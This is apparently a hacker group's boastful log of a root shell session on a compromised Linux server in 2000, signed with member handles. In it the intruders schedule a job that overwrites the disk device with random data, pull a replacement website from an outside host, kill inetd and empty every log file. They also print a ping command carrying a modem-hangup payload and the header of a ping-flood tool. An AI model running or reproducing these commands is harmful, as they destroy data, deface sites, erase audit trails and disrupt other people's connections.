##command summary##

bash# uname -a;id
Linux internet 2.2.16 #2 Tue Aug 1 15:11:13 EEST 2000 i586 unknown
uid=0(root) gid=0(root) groups=0(root)
bash# /usr/sbin/atd -s
bash# date
Sun Sep  3 11:58:39 EEST 2000
bash# at now + 1 hour
at> cat /dev/urandom > `grep ext2 /etc/mtab | awk '{print $1}'`
at>
warning: commands will be executed using /bin/sh
job 1 at 2000-09-03 13:01
bash# rsync -r test@dal-tgn-tlw-vty141.as.wcom.net:/tmp/www /home/httpd/html
bash# killall -9 inetd
bash# for log in $(ls -l /var/log| awk '{print $9}');do echo > $log;done
bash# ls -aF  ~petko
./             .mc/             Net-RawIP_tar.tar                  mnt/
../            .screenrc        amisfrag_tar.tar                   pinger
.bash_history  .ssh/            bot_cmds.tcl                       rootcron.sh
.bash_logout   .swp             gpm-root.sh                        stuff
.bash_profile  BitchX/          ircd-hybrid-6b127+UniBg-p2.tar.gz  stuff.c
.bashrc        Net-RawIP-0.07/  ircii-pana-75p3.tar.gz
bash# cat ~petko/pinger
ping -c1 -p 2b2b2b415448300d $1
bash# head -15 ~petko/stuff.c
/* tuffit.c
   Noc-Wage -*- wage@idirect.ca
           12/12/98

   This is just a modified version of:
   pingflood.c by (AntireZ) Salvatore Sanfilippo 
   enhanced by David Welton 

   I simply made it so that it will generate the ping packets so
   that they contain 0x7e which is an illegal character in PPP
   frames.  I also made it so you could set the size of the packet
   hopefully this came with my keen veracity article
   but incase it didn't here is part of it  so you understand why
   this even exsists:

bash# tail ~petko/.bash_history
ltrace --help
telnet vanilla.online.bg
ssh vanilla.online.bg
spam --help
man spam
bash# exit
exit

##decications: to petko a.k.a _b0fh_##
## to the curiois: no exploits used.only SAE(system administration errors)
who did that? sheib,darkx,famzah,grizmin,thunder,error,null,v_a_d_e_r